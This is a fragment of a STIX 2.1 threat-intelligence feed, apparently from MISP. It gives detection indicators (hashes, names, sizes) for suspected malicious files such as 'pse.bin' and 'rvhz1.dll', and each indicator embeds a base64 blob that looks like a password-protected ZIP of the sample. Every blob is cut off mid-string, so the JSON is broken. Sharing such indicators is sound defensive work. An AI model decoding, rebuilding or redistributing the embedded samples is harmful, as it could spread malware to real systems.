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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:09:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--46037d3e-727a-4508-8dcb-d10de58a764f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-19T19:06:06.000Z",
"modified": "2020-07-19T19:06:06.000Z",
"pattern": "[file:hashes.MD5 = 'dfb1fd17182503b2f15fbf6c5c30ff71' AND file:hashes.SHA1 = '4bc94298f3b7a33768718ea309f9223d3aef3250' AND file:hashes.SHA256 = '1e4cdfc57086203dce60611c3a7397399199962dc4bd4fa984b0ff0a27f8c3a9' AND file:hashes.SHA512 = '58a340497a5d8c5f2531ba67c6e2eef63768cd7cfff5cd72bbc23104f3e98ceb676e0ce369b7310f43a42aba08884bee26797cf79f1d56d38d11922f6d18ab05' AND file:hashes.SSDEEP = '384:xkHY4guhZuogdd+KEiCZfl/yGFj0KdHf4gphQTDHzJ8k6X5ihHfzwyU/9tRKhD27:f4JhymiCz/7mk3QHHaXIhLJUpKMsm' AND file:name = 'pse.bin' AND file:size = '280078' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-19T19:06:06Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--612fb261-eeee-4173-a89d-074aad7c64d2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-19T23:55:16.000Z",
"modified": "2020-07-19T23:55:16.000Z",
"pattern": "[file:hashes.MD5 = 'db91c4531aa46ce160a71b9c74c800bb' AND file:hashes.SHA1 = 'cf45535c5d392bfd58fb385edb46798d64793d98' AND file:hashes.SHA256 = '076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-19T23:55:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--513494bf-37dd-4704-a5ea-15155c29c4fc",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-20T00:00:57.000Z",
"modified": "2020-07-20T00:00:57.000Z",
"pattern": "[file:hashes.MD5 = 'db91c4531aa46ce160a71b9c74c800bb' AND file:hashes.SHA1 = 'cf45535c5d392bfd58fb385edb46798d64793d98' AND file:hashes.SHA256 = '076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab' AND file:hashes.SHA512 = 'ef843483c3f097617850b88146de88e5758841a6442d8097483a082717aeef48c4ba02f7320671378efd28afd1c1245e0207140be3c255e7470925d86e3b1bd8' AND file:hashes.SSDEEP = '6144:krMZ//+TcHKiFX1F5UsCj+2s4wsMAAJb7WjMAuk5XalWUdc2Cb:Dt+TcVFF5TUU4wtb7WgAr545e' AND file:name = 'rvhz1.dll' AND file:size = '376832' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAEIA9FCcoB6Ccr4DAADABQAgABwAZGI5MWM0NTMxYWE0NmNlMTYwYTcxYjljNzRjODAwYmJVVAkAA/veFF/73hRfdXgLAAEEIQAAAAQhAAAAW2CEUMdzUB4NDcIM1gPGqxAbyD3JRWImp7VjoRtpGOpftDXJNZy0jFmr6iKxdZFvx8euAvSJHq26y5kHykXXSoB7SXoV/2LsQIX853Op9MbvJ/sllAr0WyhTOXDVduPpZIIJYo7QrV35RX8fQ8ZZ7el9Z2PcofGJyl729aRX/vaVPeIsy3Dj7hfEmKpLbn0DOMatTG3T35+lOwypzwTVNoNTRuqNUgAQGkM/JO/9sHVNmPDU9dCiACZmEnXbI4DYgZvfRxaSrgJnzA+/sX5akjFemYOpjkV5/ITERkjAt1xhSYrDapVkmz1pzgzp61mr9beZzXkhAyMcTntm0yTUlNOP8YMFT0WEaQgzXHnqBwYBp7HhmUldCcafh1cubvuSflVfJ6bTH98vvXW4jpjlpWJgOxUbsFkweHFRKETP42/Z8AnUBn7SP0gstXFapUZ6S0kW4BSFAR596lz8fMAXFnf9tuahT+JMn46rH/q9tIZbsfiRqJ8hqgZEtXpX0APrIF2CCfyN9EOG9P30/dB1AyPyjIXJ2BCawXLOJXS0oia4lf/QdUUKItw5bQNFxH3ma8zNsznlHd+en9gPQMrF3BC39M0HSeSQdgZ0+hXFAg/5e85qKknRrpQeY8DaYalEMqugv6NfdEqP6h17IAn1v7ln0Zw5Ue//Tc0wSUPilpKzrw2h6RWkFzVRoY0OlD/ScWueMnsbjbDf+CYWCWxKYXngZ0uMn8lLnqrWYPzYUkjRNIy2d8s87WsLPEINmC6lQKsVIJdxJQHDOQN+d8tWVX9h55ytOaTwJbyUDNpfLQfi044Lf7yTV/9ouaywXYKylmxaTT511fa9YCyMyVlaCopqZ9XT/LDyR3BiVqEFkvpgq8PbuH8qM6KR3jgrILCtu5tJZIcQaPnQSGJYkaYRXlZd8TEnBNNOUFm+N1kg+WaJ5H30kRywyVYNkAr1LW1x8r2YdEN20hXXVR89hLm53z3Ds712oRDjZsrZC5AvKsNVxUceit3L7fK/DkwHdvope0e3Zs5tpH8aepXdftta4hDVRn8XeGq+vc1TcnF2yMR3dj4bk8oE26+GpJCDPrEEm03lbX3y5IOq+WsPRzSaJ32wC30UKWegU+ulbt8pEZFU9ie5F6rv1h7MG38o7CG8c7oEdipeb2DHgfoUII+k+JrnwEJoqgva5OeIzjjaSNZ14PBR/VavjyORNC2zR9v77PqoGHwfewj5A8jd4IJ30FmoT/bGlGDyJRxdLNPsJpgYpAGoJX444ol8ryrdaTC4R375eqFT4pu5wzemGjoKQiK7Rh3ziC0OVTzs+4MhDQM0oRhwwYiSWWdjTNQkw+SJ5O0aTU8rxFgfkx/JjYc5zO2e+sqcRhxVxcG+tkjvjK2Ikpw5DG6PxNdqxyEocJi9xRMiFdYnRl7kIqkrJrX4/XOHGU5VbhGwaAd1V3mNRnA+j2xMdWZmYdsTiOBzUWxTbTOzUCcju4n1UgCww4l34nJir8I1CQHNjoN1yCwz7lwZTy7rhuB1kGB6mZvkV3oe5DnmFyFBMkt1Stlf0hcfQT73looKwMpeJs04TfJsS9fBLq3TFyd/vIzNSEmzoy4Nx/5+6ilbzczz/gA/vQM7IZmISZoDMygIxRQeAm8X2/bKAKgsomKgG6zdMfSlxqADQSHqEJaumsAiEPsat0jw5BAzPfVep8ymrgEGbD21tuwbFta61jvkywU3IT+sXPBEmyqUcx5kqMXSJHfuVAxZ4nI4fig0bgnIrfSNABZREMHP1q94frIu+X8KGwqwo1GUl8gACAi8tlLOw3GKTHg975HGiYqK4PWKhx3N7UdICN7Or13Tjy8oBBk6k4l7re03mDHSohERvaYZhKATm12fFv2xFG57C7mxB2rTvbX9V3oVd5C3cBKWgVX49K3uBJIpegfPp743cj+GK8nqsJK7SjdqFvriZkchEYuA+6Np/urzXXqT9f9w3BhWCUevwV0Of45Xl2LEL0y30Ukk3pahbmF277JLMrM5RS8RoUbnH+l59W56jWrI+nQhFPvIyxaIClZ5KnWT7ErTJbzh9+9+HpTGar5+smOQ0/r6fXUwsVDpZItINdC1ymKYBpgHhgEb1nou1XHwzbBZfXbB84LlNAKomj4JkekWs7bBv+fseeIyjTUZNIUES1fna6qvq8EfblLCQRmZhRw10A2S8MnG/qMhP7TnTfkuGdYrjVDu8Xj5lHwoWlTceNCHM+nyiidTZuuWED7RBcGeC3mugRBO9GConFw/bCgeWzwd35vSiSDEXr+GJmXZSKJVTtFNy6Oejhc3L9dj86FzjePc9L8k9L9J43GEE2lbJSpDxAXpnW3WtI2qYD3gLxQHl4+J2o3AAJ/7B+XKZkzsSOzBugq6veoofgUZEwbbsIsEU2r+UJnlAE7051KcRuEVJ6y+DJHZCgHiE7utTaZzJytGjMURRoFaaM6nER+QTq8ZNieD0eeuBoY9NypwjXgFAGI7IWWJtPG0LE2QMoMdkQ5DN1GIUaVhob4v9CiO+4oKvQOifTjkQ4chtLW9ly7mZfhIq5dLCO89v2Ao6kUZjjFJOZ8x9cB9fwO25suJHC2qpbS9piNfulEDSF715tibTF416i0liNqEr+k2gou00/wDaj3b+RaeS05HLiFQevf3aKJha+DK+Vruinj4CP5R0LFbIqvo7gxc3kedeWcKCYEDVEpCkNJUVIHQzave55fW0deUfPL2LvogFlZ04xdl4P/6tBRlDpMOn5XI9/kb760cb8Q4sVkQdY3wn3+N3Lfo4ref9x4/YkvElWg+sGEz5P5QLVQFPqwJpIruI1F4m7Saiio73yPHRJ+IGGy9XbaaJdM8Urm1iB5PgN0X6tA0r5QYUjn7EpfiFiio3FT1dUoyM3O1CKz4XdpoZZLJKIbjdX52EYa1TtyG+hoXD3C37dcmP5cj86QR1fRITrC67UwxTIWUbuZc15rBpmwDCNv/n79PZaJyJTB0tRQINe3DzrLHFVPrbvDTaCHCh7EOLwJoUT7IO6v4SWROCp71yTNhIz9GXKMJw/xSFaSIXD1tYBFg4AIwA+gbdbUVJNec1gjhqQifUx77QDWgzdI7PfMgLZjrwxAzZYqJXMte4w4JzvFYLd2alf4ZRfC/iwkSHkokW8IyNIP0Ghkb/HGTVKWgMelyvqwM+kqatLkRREwOOiffDjaQevjBa4z52uUHr1VmqhTdx7FueJT8hHapuU+EviIyEWtXyb5hr3zwjAwJjq7en8dfRf9p1MS+b5hnPMRNeUC/xd/yWz42AzeHwFZ7HOtaWJGU16BMka8nrLLsLuOJwWVf4J011jZYFVssWqeAwO6dp/jdHMFPpsYU7w67Q0Rz61kwcpc5lw53E0q8
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-20T00:00:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-20T00:03:42.000Z",
"modified": "2020-07-20T00:03:42.000Z",
"pattern": "[file:hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:hashes.SHA1 = '5dc20661046ffa7cca66eb047ee01abc3ef935fa' AND file:hashes.SHA256 = 'f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6' AND file:name = 'cannot_but_soft.xsl' AND file:size = '7334' AND (file:content_ref.payload_bin = 